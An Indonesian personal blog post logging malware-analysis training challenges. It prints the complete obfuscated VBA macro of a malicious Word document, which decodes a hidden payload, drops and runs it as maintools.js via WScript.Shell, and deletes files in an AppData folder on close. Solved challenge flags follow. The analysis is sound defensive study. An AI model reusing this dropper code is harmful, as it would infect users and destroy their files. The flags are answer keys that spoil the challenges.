Challenge Semalam Belajar Tanpa AI - Day 4

Deskripsi

Sorry kemarin keskip beberapa hari, males banget nulis aseli cringe bgt, habisin banyak waktu jg oaowokoakwookaw.

Malware Analysis

Langsung aja lah ya males yapping, nama challengenya Obfuscated, di platform blue team favorit gw.

SHA256SUM

berikut adlah hasil sha256sumnya :

1
ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751

Macro Document Analysis (Oledump)

Buat analisisnya, kita perlu tools oletools dan oledump. Nah tinggal jalanin aja, ini hasil dari oledumpnya :

1
  1:       114 '\x01CompObj'
2
  2:       284 '\x05DocumentSummaryInformation'
3
  3:       392 '\x05SummaryInformation'
4
  4:      8017 '1Table'
5
  5:      4096 'Data'
6
  6:       483 'Macros/PROJECT'
7
  7:        65 'Macros/PROJECTwm'
8
  8: M    7117 'Macros/VBA/Module1'
9
  9: m    1104 'Macros/VBA/ThisDocument'
10
 10:      3467 'Macros/VBA/_VBA_PROJECT'
11
 11:      2964 'Macros/VBA/__SRP_0'
12
 12:       195 'Macros/VBA/__SRP_1'
13
 13:      2717 'Macros/VBA/__SRP_2'
14
 14:       290 'Macros/VBA/__SRP_3'
15
 15:       565 'Macros/VBA/dir'
16
 16:        76 'ObjectPool/_1541577328/\x01CompObj'
17
 17: O   20301 'ObjectPool/_1541577328/\x01Ole10Native'
18
 18:      5000 'ObjectPool/_1541577328/\x03EPRINT'
19
 19:         6 'ObjectPool/_1541577328/\x03ObjInfo'
20
 20:    133755 'WordDocument'

Bisa kita lihat bahwa ada macro vba dari stream 8 sampe stream 15.

Macro Document Analysis (Olevba)

Berikut adalah hasil olevbanya :

1
olevba 0.60.2 on Python 3.13.5 - http://decalage.info/python/oletools
2
===============================================================================
3
FILE: 49b367ac261a722a7c2bbbc328c32545
4
Type: OLE
5
-------------------------------------------------------------------------------
6
VBA MACRO ThisDocument.cls
7
in file: 49b367ac261a722a7c2bbbc328c32545 - OLE stream: 'Macros/VBA/ThisDocument'
8
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
9
(empty macro)
10
-------------------------------------------------------------------------------
11
VBA MACRO Module1.bas
12
in file: 49b367ac261a722a7c2bbbc328c32545 - OLE stream: 'Macros/VBA/Module1'
13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
14
Public OBKHLrC3vEDjVL As String
15
Public B8qen2T433Ds1bW As String
16
Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
17
Dim THQNfU76nlSbtJ5nX8LY6 As Byte
18
THQNfU76nlSbtJ5nX8LY6 = 45
19
For i = 0 To M5wI32R3VF2g5B21EK4d - 1
20
EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
21
THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
22
Next i
23
Q7JOhn5pIl648L6V43V = True
24
End Function
25
Sub AutoClose()
26
On Error Resume Next
27
Kill OBKHLrC3vEDjVL
28
On Error Resume Next
29
Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
30
R7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW & "\*.*", True
31
Set R7Ks7ug4hRR2weOy7 = Nothing
32
End Sub
33
Sub AutoOpen()
34
On Error GoTo MnOWqnnpKXfRO
35
Dim NEnrKxf8l511
36
Dim N18Eoi6OG6T2rNoVl41W As Long
37
Dim M5wI32R3VF2g5B21EK4d As Long
38
N18Eoi6OG6T2rNoVl41W = FileLen(ActiveDocument.FullName)
39
NEnrKxf8l511 = FreeFile
40
Open (ActiveDocument.FullName) For Binary As #NEnrKxf8l511
41
Dim E2kvpmR17SI() As Byte
42
ReDim E2kvpmR17SI(N18Eoi6OG6T2rNoVl41W)
43
Get #NEnrKxf8l511, 1, E2kvpmR17SI
44
Dim KqG31PcgwTc2oL47hjd7Oi As String
45
KqG31PcgwTc2oL47hjd7Oi = StrConv(E2kvpmR17SI, vbUnicode)
46
Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
47
Dim VUy5oj112fLw51h6S
48
Set VUy5oj112fLw51h6S = CreateObject("vbscript.regexp")
49
VUy5oj112fLw51h6S.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
50
Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
51
Dim Y5t4Ul7o385qK4YDhr
52
If I4j833DS5SFd34L3gwYQD.Count = 0 Then
53
GoTo MnOWqnnpKXfRO
54
End If
55
For Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD
56
Y5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex
57
Exit For
58
Next
59
Dim Wk4o3X7x1134j() As Byte
60
Dim KDXl18qY4rcT As Long
61
KDXl18qY4rcT = 16827
62
ReDim Wk4o3X7x1134j(KDXl18qY4rcT)
63
Get #NEnrKxf8l511, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j
64
If Not Q7JOhn5pIl648L6V43V(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then
65
GoTo MnOWqnnpKXfRO
66
End If
67
B8qen2T433Ds1bW = Environ("appdata") & "\Microsoft\Windows"
68
Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
69
If Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then
70
B8qen2T433Ds1bW = Environ("appdata")
71
End If
72
Set R7Ks7ug4hRR2weOy7 = Nothing
73
Dim K764B5Ph46Vh
74
K764B5Ph46Vh = FreeFile
75
OBKHLrC3vEDjVL = B8qen2T433Ds1bW & "\" & "maintools.js"
76
Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh
77
Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j
78
Close #K764B5Ph46Vh
79
Erase Wk4o3X7x1134j
80
Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
81
R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " EzZETcSXyKAdF_e5I2i1"
82
ActiveDocument.Save
83
Exit Sub
84
MnOWqnnpKXfRO:
85
Close #K764B5Ph46Vh
86
ActiveDocument.Save
87
End Sub

Kalau kita lihat dan analisis bagian bawah, terdapat script yang ngejalanin wscript.shell, yaitu ini :

1
Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
2
R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " EzZETcSXyKAdF_e5I2i1"

Nah jadi potongan script di atas akan ngejalanin wscript dengan 2 argument, dan argument yang terakhir yaitu EzZETcSXyKAdF_e5I2i1 merupakan keynya. Kalau kita telusuri lagi, kan OBKHLrC3vEDjVL jadi argumen pertama, nah string tsb dideklarasikan sebagai berikut

1
OBKHLrC3vEDjVL = B8qen2T433Ds1bW & "\" & "maintools.js"
2
Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh

Jadi string tadi akan ngelakukan execute terhadap program bernama maintools.js.

Malware Analysis Kedua

Yang pertama gw ga selesaiin wkwkkwkwkw.

Malware000 Initial Analysis

Ketika di strings dapet flag

1
ZmxhZzwwb3BzX2lfdXNlZF8xMzM3X2I2NF9lbmNyeXB0aW9uPgo=
2

3
echo "ZmxhZzwwb3BzX2lfdXNlZF8xMzM3X2I2NF9lbmNyeXB0aW9uPgo=" | base64 -d
4
flag<0ops_i_used_1337_b64_encryption>

just_some_js Initial Analysis

JSfuck biasa, tinggal decode aja pake https://www.dcode.fr/jsfuck-language nanti dapet flag

1
console.log("flag<what_a_cheeky_language!1!>")

this_is_not_js Initial Analysis

Brainfuck, tinggal decode pake https://www.dcode.fr/brainfuck-language nanti dapet flagnya

1
flag<Now_THIS_is_programming>

Malware101 Initial Analysis

Buka pake IDA, ntar keliatan ada charnya, nah tinggal balikin manual.

Kesimpulan

Mager bgt nulis, sorry klaau di blog yang ini kurang nyaman dibaca, tujuan gw bukan buat share, cm buat ninggalin jejak aja biar tau lah progress gw gimana. Pokoknya yang series challenge harian itu emang tujuan gw pure buat track progress aja, kalau kalian mau baca baca, gw lebih saranin ke categories selain No Ai Terimakasih banyak btw, good night.